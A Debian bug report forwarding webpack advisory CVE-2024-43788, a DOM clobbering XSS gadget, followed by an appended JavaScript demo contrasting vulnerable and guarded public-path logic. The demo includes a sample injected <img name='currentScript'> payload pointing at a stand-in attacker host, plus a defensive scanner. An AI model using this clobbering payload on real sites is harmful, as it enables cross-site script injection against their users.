Source: node-webpack
X-Debbugs-CC: t...@security.debian.org
Severity: important
Tags: security

Hi,

The following vulnerability was published for node-webpack.

CVE-2024-43788[0]:
| Webpack is a module bundler. Its main purpose is to bundle
| JavaScript files for usage in a browser, yet it is also capable of
| transforming, bundling, or packaging just about any resource or
| asset. The webpack developers have discovered a DOM Clobbering
| vulnerability in Webpack’s `AutoPublicPathRuntimeModule`. The DOM
| Clobbering gadget in the module can lead to cross-site scripting
| (XSS) in web pages where scriptless attacker-controlled HTML
| elements (e.g., an `img` tag with an unsanitized `name` attribute)
| are present. Real-world exploitation of this gadget has been
| observed in the Canvas LMS, which allows an XSS attack to happen
| through JavaScript code compiled by Webpack (the vulnerable part
| is from Webpack). DOM Clobbering is a type of code-reuse attack
| where the attacker first embeds a piece of non-script, seemingly
| benign HTML markup in the webpage (e.g. through a post or comment)
| and leverages the gadgets (pieces of JS code) living in the existing
| JavaScript code to transform it into executable code. This
| vulnerability can lead to cross-site scripting (XSS) on websites
| that include Webpack-generated files and allow users to inject
| certain scriptless HTML tags with improperly sanitized name or id
| attributes. This issue has been addressed in release version 5.94.0.
| All users are advised to upgrade. There are no known workarounds for
| this issue.

https://github.com/webpack/webpack/security/advisories/GHSA-4vvj-4cpr-p986
https://github.com/webpack/webpack/commit/955e057abc6cc83cbc3fa1e1ef67a49758bf5a61 (v5.94.0)

If you fix the vulnerability please also make sure to include the
CVE (Common Vulnerabilities & Exposures) id in your changelog entry.

For further information see:

[0] https://security-tracker.debian.org/tracker/CVE-2024-43788
    https://www.cve.org/CVERecord?id=CVE-2024-43788

Please adjust the affected versions in the BTS as needed.
-- 
Pkg-javascript-devel mailing list
Pkg-javascript-devel@alioth-lists.debian.net
https://alioth-lists.debian.net/cgi-bin/mailman/listinfo/pkg-javascript-devel
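Added example, not part of the bug report and not webpack's own code: a Node-runnable model of the gadget the advisory describes (the runtime reading `document.currentScript.src` to derive its public path, while a scriptless element such as `<img name="currentScript">` shadows that property) next to the kind of guard that closes it, plus a small HTML check a site owner can run over user-supplied markup. Every "document" object, element stand-in, URL and the `sensitive` property list below is constructed for the demo; the tag-name check is an assumption about a sufficient guard, not a quotation of the v5.94.0 commit.

```javascript
// Minimal element stand-in (constructed; tagName/src mirror the two
// HTMLElement properties the public-path logic reads). No real DOM involved.
function makeElement(tagName, src) {
  return { tagName, src };
}

// Reduce a script URL to the directory it was served from.
function baseUrlOf(scriptUrl) {
  return scriptUrl
    .replace(/^blob:/, "")
    .replace(/#.*$/, "")
    .replace(/\?.*$/, "")
    .replace(/\/[^/]+$/, "/");
}

// Last <script> element with an http(s) src, the usual fallback when
// document.currentScript is unavailable.
function lastHttpScriptSrc(scripts) {
  for (let i = scripts.length - 1; i >= 0; i--) {
    const src = scripts[i].src;
    if (src && /^https?:/.test(src)) return src;
  }
  return undefined;
}

// General shape of automatic public-path resolution in a browser bundle:
// prefer document.currentScript.src, otherwise fall back to the last script
// tag. This variant trusts whatever object sits behind currentScript.
function derivePublicPathUnsafe(doc) {
  let scriptUrl;
  if (doc.currentScript) scriptUrl = doc.currentScript.src;
  if (!scriptUrl) scriptUrl = lastHttpScriptSrc(doc.scripts);
  if (!scriptUrl) throw new Error("Automatic publicPath is not supported in this browser");
  return baseUrlOf(scriptUrl);
}

// Hardened variant: Document exposes named elements as properties and lets
// them override built-ins, so an <img name="currentScript" src="..."> turns
// doc.currentScript into an <img> whose src the page author never chose.
// Only a genuine <script> element is accepted here (assumed guard).
function derivePublicPathGuarded(doc) {
  let scriptUrl;
  const cur = doc.currentScript;
  if (cur && typeof cur.tagName === "string" && cur.tagName.toUpperCase() === "SCRIPT") {
    scriptUrl = cur.src;
  }
  if (!scriptUrl) scriptUrl = lastHttpScriptSrc(doc.scripts);
  if (!scriptUrl) throw new Error("Automatic publicPath is not supported in this browser");
  return baseUrlOf(scriptUrl);
}

// Defender-side check over raw HTML: report non-script elements whose name/id
// collides with a Document property the bundle runtime relies on. The property
// list is a parameter; "currentScript" is the one this advisory concerns.
function findClobberingNames(html, sensitive = ["currentScript"]) {
  const hits = [];
  const attr = /<(\w+)[^>]*\s(name|id)\s*=\s*["']([^"']+)["']/gi;
  let m;
  while ((m = attr.exec(html)) !== null) {
    if (sensitive.includes(m[3]) && m[1].toLowerCase() !== "script") {
      hits.push({ tag: m[1].toLowerCase(), attr: m[2].toLowerCase(), value: m[3] });
    }
  }
  return hits;
}

// Constructed sample documents (placeholder origins). The clobbered page
// carries the same bundle script plus one <img> shadowing currentScript.
const bundle = makeElement("SCRIPT", "https://app.example/assets/main.js");
const cleanDoc = { currentScript: bundle, scripts: [bundle] };
const clobberedDoc = {
  currentScript: makeElement("IMG", "https://attacker.example/chunks/x.png"),
  scripts: [bundle],
};
const sampleHtml = '<p>hello</p><img name="currentScript" src="https://attacker.example/chunks/x.png">';

function demo() {
  return {
    cleanUnsafe: derivePublicPathUnsafe(cleanDoc),
    cleanGuarded: derivePublicPathGuarded(cleanDoc),
    clobberedUnsafe: derivePublicPathUnsafe(clobberedDoc),   // foreign origin wins
    clobberedGuarded: derivePublicPathGuarded(clobberedDoc), // falls back to the real script
    htmlHits: findClobberingNames(sampleHtml),
  };
}

if (typeof require !== "undefined" && require.main === module) console.log(demo());
```

The contrast worth noting is in the clobbered case: the unguarded resolver yields a base URL on the foreign origin, so every lazily loaded chunk would be fetched from there, while the guarded resolver ignores the `<img>` and lands on the bundle's own directory. `findClobberingNames` is the complementary control on the content side: strip or rename `name`/`id` values that shadow `document` properties before user markup reaches a page that ships a webpack bundle older than 5.94.0.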